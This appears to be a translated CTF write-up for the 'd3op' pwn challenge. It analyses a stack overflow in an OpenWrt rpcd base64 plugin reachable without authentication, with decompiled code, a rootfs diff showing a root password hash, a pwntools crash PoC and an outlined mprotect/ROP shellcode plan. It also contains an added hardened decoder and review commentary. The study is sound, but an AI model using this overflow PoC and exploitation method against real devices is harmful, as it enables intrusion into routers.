[Original] AntCTF x D³CTF 2023 d3op Write-up Notes

Posted on: 2023-5-12 16:51 20640
The challenge category is PWN; its description is as follows:

Challenge files: https://github.com/z1r00/ctf-pwn/blob/main/AntCTF%20x%20D%C2%B3CTF/d3op/d3op-attachment-d362854d3418636059155138fd58997c.zip

Unpack the firmware shipped with the challenge; it turns out to be OpenWrt 22.03.3.

The hint says to do a diff, so download a stock 22.03.3 image from the official site and diff the two root filesystems; the diff result is as follows.

The diff shows the challenge adds two key things: a network config and base64.

It also shows that base64 is an rpcd plugin (/usr/libexec/rpcd/base64) exposed as a ubus object, with its decode and encode methods listed in the unauthenticated ACL.

`ubus list` shows the objects currently registered on ubus.

To interact with base64, use `ubus call`, but first we need to know what input format base64 expects.

`ubus -v list base64` shows it has two methods, encode and decode, each taking a string named input; they are called as follows.

You can see z1r0 being base64-encoded and printed (the output ejFyMAA= decodes to z1r0 followed by a NUL byte, so the encoder includes the string terminator). The vulnerability is most likely in base64, which completes the initial analysis.

The main function is the argument-dispatch logic: when argv[1] is not "list" it enters read_input (check_method returns 0 on a match, strcmp-style), and when argv[1] is "call", argv[2] is passed on as the method name.

read_input lets you enter another chunk of data; after some processing the input is parsed and checked for an "input" key, and only then does execution reach the next check.

Take a look at ckec.

So running ./base64 call encode/decode reaches the encode/decode handling logic normally.

Thus the complete command to reach the decode/encode handling logic is:

First look at decode.

At the start of decode the output length is computed from the input size: len = 3 * (size / 4), decremented once for each trailing '='. The destination v16 is a fixed 1028-byte stack buffer, but the index written into v16 is never checked against that size, and the raw input read by main can be up to 0xFFF bytes, so a long enough encoded input writes past v16 and overflows the stack.

This completes the search for the vulnerability.
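To make the defect concrete, here is an added example (my code, not the write-up's or the challenge binary's) that models the length computation of the decompiled decode() next to a hardened decoder. The length formula, the 1028-byte buffer size and the 0x458-byte PoC input length are taken from the page; the alphabet validation, the padding rules and the helper names are my own additions, and the binary's lookup table byte_4A1F98 is not modelled.

```c
#include <stdint.h>
#include <string.h>

/* Size of the stack buffer `char v16[1028]` in the decompiled decode(). */
#define OUT_CAP 1028

/* Output length exactly as the challenge's decode() derives it: 3 bytes per
 * 4-character group, minus one per trailing '='. Nothing here depends on how
 * large the destination is; only `size` (the attacker-supplied "input" string
 * length) drives it. Returns -1 when size is zero or not a multiple of four
 * (the binary returns early on the latter; the zero case would read in[-1]). */
long decoded_len_unchecked(const char *in, size_t size)
{
    if (size == 0 || (size & 3) != 0)
        return -1;
    long len = 3 * (long)(size >> 2);
    if (in[size - 1] == '=')
        --len;
    if (in[size - 2] == '=')
        --len;
    return len;
}

/* Standard base64 alphabet lookup; -1 for any byte outside it (assumption:
 * the binary instead indexes a table with the raw input byte). */
int b64_value(int c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    return c == '+' ? 62 : c == '/' ? 63 : -1;
}

/* Hardened decoder: same length formula, plus the check the binary lacks
 * (computed length vs. destination capacity, before any write). Also accepts
 * '=' only as trailing padding and rejects non-alphabet bytes. Returns bytes
 * written, or -1. */
long b64_decode_checked(const char *in, size_t size,
                        unsigned char *out, size_t out_cap)
{
    long len = decoded_len_unchecked(in, size);
    if (len < 0 || (size_t)len > out_cap)   /* the missing bounds check */
        return -1;
    size_t o = 0;
    for (size_t i = 0; i < size; i += 4) {
        uint32_t acc = 0;
        int pad = 0;
        for (int k = 0; k < 4; k++) {
            int c = (unsigned char)in[i + k];
            if (c == '=') {
                /* padding only in the last two slots of the final group */
                if (i + 4 != size || k < 2)
                    return -1;
                pad++;
                acc <<= 6;
            } else {
                int v = b64_value(c);
                if (pad || v < 0)            /* data after '=' or bad byte */
                    return -1;
                acc = (acc << 6) | (uint32_t)v;
            }
        }
        unsigned char bytes[3] = { (unsigned char)(acc >> 16),
                                   (unsigned char)(acc >> 8),
                                   (unsigned char)acc };
        /* never emit past len; len <= out_cap was established above */
        for (int k = 0; k < 3 - pad && o < (size_t)len; k++)
            out[o++] = bytes[k];
    }
    return (long)o;
}

/* The write-up's sample: "ejFyMAA=" must yield 'z','1','r','0' and a NUL. */
int check_sample_roundtrip(void)
{
    unsigned char out[OUT_CAP];
    long n = b64_decode_checked("ejFyMAA=", 8, out, sizeof out);
    return n == 5 && memcmp(out, "z1r0", 5) == 0;   /* literal includes NUL */
}

/* Constructed input modelled on the crash PoC: 0x458 raw bytes encode to
 * 1484 base64 characters ending in a single '='. */
#define LONG_INPUT_CHARS 1484
static void fill_long_input(char *buf)
{
    memset(buf, 'A', LONG_INPUT_CHARS);
    buf[LONG_INPUT_CHARS - 1] = '=';
}

/* What the binary computes for that input: 3*371 - 1 = 1112, larger than v16. */
long long_input_unchecked_len(void)
{
    char buf[LONG_INPUT_CHARS];
    fill_long_input(buf);
    return decoded_len_unchecked(buf, LONG_INPUT_CHARS);
}

/* What the hardened decoder does with it: refuses before writing anything. */
long long_input_checked_result(void)
{
    char buf[LONG_INPUT_CHARS];
    unsigned char out[OUT_CAP];
    fill_long_input(buf);
    return b64_decode_checked(buf, LONG_INPUT_CHARS, out, sizeof out);
}
```

The point of the pair is that the fix is a single comparison placed before the loop: the binary already knows `len` when it starts writing, it just never compares it with the size of v16.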
Next is how to exploit it; first look at the protections.

With no stack canary, the return address can be overwritten directly to hijack control flow; the following PoC was written.

While debugging, it SIGSEGVs at the following place.

Look at the assembly.

The address loaded into X0 is wrong: 0x450 - 8 = 0x448, which is v24. v24 was overwritten during the overflow, and that is what caused the SIGSEGV.

So v22, v23, v24 and v25 (the four unsigned ints that sit above v16 at 0x440..0x44C: size, v23, v24 and len) must all be set to sane values for the function to keep running.

So the following PoC was written.

It successfully controls ret to 0x6262626262626262; next is building the ROP chain.

system was not found, but mprotect was.

If a1, a2 and a3 can be controlled, an rwx region can be mapped directly to run shellcode. Use the cross-reference approach from the rwctf shellfind method to look for a gadget that controls one of a1, a2, a3 and can also execute the address of sub_423340.

The reason for this is that I first went straight for gadgets that load x21 and x19 and then mov them into x1 and x2, but after controlling them, executing sub_423340 ran into problems because of how x21 and x19 were set.

If any one of a1, a2, a3 can be controlled and sub_423340 can be executed, it is then possible to jump to the shellcode.

The section above meets the requirement: control x19 first, then control x2, and finally reach the section above.

The official write-up's approach is simpler: control x0, then jump to the shellcode.

The shellcode can be ORW; below is the exploit run against base64 directly, and the flag is printed successfully.

But there is a problem when running remotely.

There is no flag in result, because the output format is {"output":"flag"}, while 0x4a2098 above holds the flag directly. So {"output": " needs to be built at some address, with the flag placed after it and "} appended at the end.

The final local exploit is as follows.

Remote is as follows.

The remote interaction is as follows.

This concludes the d3op review.

Learned a lot: ubus communication, and how to use gadgets elegantly (XD
d3op
It might take a long time to start up, please connect about 2 minutes after the gambox start.
HINTS: May be you need to do a diff with the rootfs in attachment.
```
  _______                     ________        __
 |       |.-----.-----.-----.|  |  |  |.----.|  |_
 |   -   ||  _  |  -__|     ||  |  |  ||   _||   _|
 |_______||   __|_____|__|__||________||__| |____|
          |__| W I R E L E S S   F R E E D O M
 -----------------------------------------------------
 OpenWrt 22.03.3, r20028-43d71ad93e
 -----------------------------------------------------
```
```diff
diff: openwrt/squashfs-root/etc/TZ: No such file or directory
Only in d3op/squashfs-root/etc/config: network
diff: openwrt/squashfs-root/etc/localtime: No such file or directory
diff: openwrt/squashfs-root/etc/mtab: No such file or directory
diff: openwrt/squashfs-root/etc/ppp/resolv.conf: No such file or directory
diff: openwrt/squashfs-root/etc/resolv.conf: No such file or directory
diff --color -aur openwrt/squashfs-root/etc/shadow d3op/squashfs-root/etc/shadow
--- openwrt/squashfs-root/etc/shadow	2023-01-03 08:24:21
+++ d3op/squashfs-root/etc/shadow	2023-04-12 17:33:08
@@ -1,4 +1,4 @@
-root:::0:99999:7:::
+root:$6$JlPmKq/ZhqQ0I6V6$B74FL6cufcnZKT4G0sUz3xNP0Pr4k7yOG2I091f2OFOmcldS2s7CPJwOcfx0r/OshYDOFKw76APIqPHBXCdXb/:19442::::::
 daemon:*:0:0:99999:7:::
 ftp:*:0:0:99999:7:::
 network:*:0:0:99999:7:::
```
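Review bot: the `+root:$6$...` line bakes a root password hash into the distributed rootfs, which is a credential disclosure for anyone holding the image (an offline guess against a SHA-512 crypt hash is entirely in the image holder's hands); on a real device this should be a per-device secret set at provisioning, not a hash shipped in the squashfs. For reading the challenge it also tells us the stock image's open root login has been closed, so the console is not the intended way in.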
```diff
diff: openwrt/squashfs-root/etc/ssl/cert.pem: No such file or directory
Only in d3op/squashfs-root: flag
diff: openwrt/squashfs-root/sbin/insmod: No such file or directory
diff: openwrt/squashfs-root/sbin/lsmod: No such file or directory
diff: openwrt/squashfs-root/sbin/modinfo: No such file or directory
diff: openwrt/squashfs-root/sbin/modprobe: No such file or directory
diff: openwrt/squashfs-root/sbin/rmmod: No such file or directory
diff: openwrt/squashfs-root/usr/bin/scp: No such file or directory
diff: openwrt/squashfs-root/usr/bin/ssh: No such file or directory
diff: openwrt/squashfs-root/usr/bin/wget: No such file or directory
Only in d3op/squashfs-root/usr/libexec/rpcd: base64
diff --color -aur openwrt/squashfs-root/usr/share/rpcd/acl.d/unauthenticated.json d3op/squashfs-root/usr/share/rpcd/acl.d/unauthenticated.json
--- openwrt/squashfs-root/usr/share/rpcd/acl.d/unauthenticated.json	2023-01-03 08:24:21
+++ d3op/squashfs-root/usr/share/rpcd/acl.d/unauthenticated.json	2023-04-10 02:25:53
@@ -1,13 +1,17 @@
 {
-	"unauthenticated": {
-		"description": "Access controls for unauthenticated requests",
-		"read": {
-			"ubus": {
-				"session": [
-					"access",
-					"login"
-				]
-			}
-		}
-	}
+	"unauthenticated": {
+		"description": "Access controls for unauthenticated requests",
+		"read": {
+			"ubus": {
+				"session": [
+					"access",
+					"login"
+				],
+				"base64": [
+					"decode",
+					"encode"
+				]
+			}
+		}
+	}
 }
```
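Review bot: the added `"base64": ["decode", "encode"]` entry under `unauthenticated.read.ubus` grants callers with no session at all the two methods of the new `/usr/libexec/rpcd/base64` plugin, so whatever that plugin does with its "input" string is now pre-authentication attack surface over rpcd; an ACL widening like this should be reviewed together with the plugin it exposes and limited to methods known to be safe on untrusted input. Seen next to `Only in d3op/squashfs-root: flag`, this hunk is what makes the rest of the write-up reachable.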
```
 - list [<path>]                        List objects
 - call <path> <method> [<message>]     Call an object method
 - listen [<path>...]                   Listen for events
 - send <type> [<message>]              Send an event
 - wait_for <object> [<object>...]      Wait for multiple objects to appear on ubus
```
```
root@(none):/# ubus list
base64
container
dhcp
file
hotplug.dhcp
hotplug.iface
hotplug.neigh
hotplug.net
hotplug.ntp
hotplug.tftp
iwinfo
luci
luci-rpc
network
network.device
network.interface
network.interface.lan
network.interface.loopback
network.rrdns
network.wireless
rc
service
session
system
uci
```
```
root@(none):/# ubus -v list base64
'base64' @1e449b72
	"encode":{"input":"String"}
	"decode":{"input":"String"}
```
```
root@(none):/# ubus call base64 encode '{"input" : "z1r0"}'
{
	"output": "ejFyMAA="
}
```
```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v6[4096]; // [xsp+28h] [xbp-1028h] BYREF
  unsigned __int64 *specific_method; // [xsp+1028h] [xbp-28h]
  __int64 v8; // [xsp+1030h] [xbp-20h]
  __int64 *v9; // [xsp+1038h] [xbp-18h]
  int v10; // [xsp+1044h] [xbp-Ch]
  unsigned __int64 *method; // [xsp+1048h] [xbp-8h]

  init_base64();                                // base64 table
  if ( argc <= 1 )
    return 0;
  method = argv[1];
  if ( check_method(method, "list") )
  {
    v10 = read_input(0, v6, 0xFFFuLL);
    v6[v10] = 0;
    v9 = sub_402478(v6);
    if ( v9 )
    {
      v8 = sub_403C90(v9, "input");
      if ( v8 && sub_4059D0(v8) )
      {
        specific_method = argv[2];
        if ( !check_method(method, "call") )
        {
          ckec(specific_method, *(v8 + 32), byte_4A2098);
          sub_40B230("{\"output\": \"%s\"}\n", byte_4A2098);
          sub_400A10(v9);
        }
        return 0;
      }
      else
      {
        return 0;
      }
    }
    else
    {
      return 0;
    }
  }
  else
  {
    uloop_init();
    return 0;
  }
}
```
```c
unsigned __int64 __fastcall sub_422E60(int a1, void *a2, size_t a3)
{
  unsigned __int64 v4; // x19
  unsigned int v8; // w3
  unsigned __int64 v9; // x19
  int v10; // w2
  int v11; // w2

  if ( byte_4A0F78 )
  {
    v4 = linux_eabi_syscall(__NR_read, a1, a2, a3);
    if ( v4 > 0xFFFFFFFFFFFFF000LL )
    {
      v10 = -v4;
      v4 = -1LL;
      *(&dword_4A8590 + _ReadStatusReg(ARM64_SYSREG(3, 3, 13, 0, 2))) = v10;
    }
    return v4;
  }
  else
  {
    v8 = sub_444C30();
    v9 = linux_eabi_syscall(__NR_read, a1, a2, a3);
    if ( v9 > 0xFFFFFFFFFFFFF000LL )
    {
      v11 = -v9;
      v9 = -1LL;
      *(&dword_4A8590 + _ReadStatusReg(ARM64_SYSREG(3, 3, 13, 0, 2))) = v11;
    }
    sub_444CC0(v8);
    return v9;
  }
}
```
```c
ckec(specific_method, *(v8 + 32), byte_4A2098);
sub_40B230("{\"output\": \"%s\"}\n", byte_4A2098);
sub_400A10(v9);
```
```c
__int64 __fastcall sub_4064F0(unsigned __int64 *a1, __int64 a2, __int64 a3)
{
  if ( check_method(a1, "encode") )
  {
    if ( !check_method(a1, "decode") )
      decode(a2, a3);
  }
  else
  {
    encode(a2, a3);
  }
  return 0LL;
}
```
```
➜ squashfs-root ./base64 call encode
{"input":"z1r0"}
{"output": "ejFyMAA="}
```
```c
__int64 __fastcall decode(char *json_input, __int64 out_put)
{
  int v3; // w0
  int v4; // w0
  int v5; // w0
  int v6; // w0
  int v7; // w0
  int v8; // w0
  int v9; // w0
  int v10; // w0
  int v11; // w0
  int v12; // w0
  int v13; // w0
  char v16[1028]; // [xsp+28h] [xbp+28h]
  int v17; // [xsp+42Ch] [xbp+42Ch]
  int v18; // [xsp+430h] [xbp+430h]
  int v19; // [xsp+434h] [xbp+434h]
  int v20; // [xsp+438h] [xbp+438h]
  int v21; // [xsp+43Ch] [xbp+43Ch]
  unsigned int size; // [xsp+440h] [xbp+440h]
  unsigned int v23; // [xsp+444h] [xbp+444h]
  unsigned int v24; // [xsp+448h] [xbp+448h]
  unsigned int len; // [xsp+44Ch] [xbp+44Ch]

  size = sub_400300();
  if ( (size & 3) != 0 )
    return 0LL;
  len = 3 * (size >> 2);
  if ( json_input[size - 1] == '=' )
    --len;
  if ( json_input[size - 2] == 61 )
    --len;
  if ( out_put )
  {
    v24 = 0;
    v23 = 0;
    while ( size > v24 )
    {
      if ( json_input[v24] == 61 )
      {
        ++v24;
        v3 = 0;
      }
      else
      {
        v4 = v24++;
        v3 = byte_4A1F98[json_input[v4]];
      }
      v21 = v3;
      if ( json_input[v24] == 61 )
      {
        ++v24;
        v5 = 0;
      }
      else
      {
        v6 = v24++;
        v5 = byte_4A1F98[json_input[v6]];
      }
      v20 = v5;
      if ( json_input[v24] == 61 )
      {
        ++v24;
        v7 = 0;
      }
      else
      {
        v8 = v24++;
        v7 = byte_4A1F98[json_input[v8]];
      }
      v19 = v7;
      if ( json_input[v24] == 61 )
      {
        ++v24;
        v9 = 0;
      }
      else
      {
        v10 = v24++;
        v9 = byte_4A1F98[json_input[v10]];
      }
      v18 = v9;
      v17 = v9 + (v21 << 18) + (v20 << 12) + (v19 << 6);
      if ( len > v23 )
      {
        v11 = v23++;
        v16[v11] = BYTE2(v17);
      }
      if ( len > v23 )
      {
        v12 = v23++;
        v16[v12] = BYTE1(v17);
      }
      if ( len > v23 )
      {
        v13 = v23++;
        v16[v13] = v17;
      }
    }
    sub_4002B0();
  }
  return 0LL;
}
```
```
Arch:     aarch64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)
```
```python
from pwn import *
from os import system
import base64

# coloured print helpers
li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

file_name = './base64'
# run the rpcd plugin directly with the arguments main() expects
r = process([file_name, 'call', 'decode'])

def dbgg():
    # pause so a debugger can be attached before the input is sent
    input()

elf = ELF(file_name)
dbgg()

p1 = b'aaaa'
p1 = p1.ljust(0x458, b"a")        # raw payload longer than the 1028-byte v16
p1 = base64.b64encode(p1)         # decode() expands this back onto the stack
ret = 0x406550
li(p1)
p2 = b'{"input":"' + p1 + b'"}'   # JSON shape main() parses for the "input" key
li(p2)
r.sendline(p2)
r.interactive()
```